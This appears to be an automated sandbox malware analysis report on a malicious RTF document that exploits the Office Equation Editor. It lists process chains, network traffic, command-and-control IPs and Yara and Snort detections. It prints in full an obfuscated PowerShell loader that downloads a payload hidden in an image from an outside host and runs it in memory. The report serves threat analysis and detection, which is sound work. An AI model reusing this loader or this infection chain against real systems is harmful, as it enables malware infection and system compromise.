Network connect: IP: 23.95.235.16 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035105D5 LoadLibraryW,	2_2_035105D5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03510696 ShellExecuteW,ExitProcess,	2_2_03510696
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03510668
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03510681 ShellExecuteW,ExitProcess,	2_2_03510681
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0351050A ExitProcess,	2_2_0351050A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035106BB ExitProcess,	2_2_035106BB

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic

DNS query: name: uploaddeimagens.com.br

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 91.92.254.29:80 -> 192.168.2.22:49162

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 91.92.254.29 80

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_03510668

Source: global traffic

HTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 23.95.235.16 23.95.235.16
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: THEZONEBG THEZONEBG
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: global traffic	HTTP traffic detected: GET /33011/greatideaforfollowers.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Users_API/syscore/file_xgep41gp.dyp.txt HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.29

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_03510668

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F0D9C1B9-F0D5-4902-9161-FED34811C4AD}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /33011/greatideaforfollowers.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Users_API/syscore/file_xgep41gp.dyp.txt HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.29

Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: uploaddeimagens.com.br

Source: EQNEDT32.EXE, 00000002.00000002.346070197.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.1
Source: EQNEDT32.EXE, 00000002.00000002.346070197.00000000005FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/33011/grJ
Source: EQNEDT32.EXE, 00000002.00000002.346070197.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/33011/greatideaforfollowers.gif
Source: EQNEDT32.EXE, 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/33011/greatideaforfollowers.gifj
Source: EQNEDT32.EXE, 00000002.00000002.346070197.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/33011/greatideaforfollowers.gifyyC:
Source: wscript.exe, 00000005.00000002.359992594.0000000000677000.00000004.00000020.00020000.00000000.sdmp, greatideaforfollowers.vBS.2.dr, greatideaforfollowers[1].gz.2.dr	String found in binary or memory: http://91.92.254.29/Users_API/syscore/file_xgep41gp.dyp.txt
Source: powershell.exe, 00000006.00000002.359414442.0000000004FF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000006.00000002.359414442.0000000004FF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.358503012.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.358503012.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://uploaddeimagens.com.br
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000006.00000002.358503012.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000006.00000002.358383867.00000000004D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/
Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.359414442.0000000004F86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235
Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235YKo;
Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235p
Source: powershell.exe, 00000006.00000002.358503012.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000003015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000006.00000002.358503012.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000003015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163

System Summary

Malicious sample detected (through community Yara rule)

Source: 4YlwTsmpuZ.rtf, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgID	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgID	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: 4YlwTsmpuZ.rtf, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.expl.evad.winRTF@7/12@1/3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$lwTsmpuZ.rtf

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR65F3.tmp

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 4YlwTsmpuZ.rtf	Virustotal: Detection: 52%
Source: 4YlwTsmpuZ.rtf	ReversingLabs: Detection: 50%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"	Jump to behavior
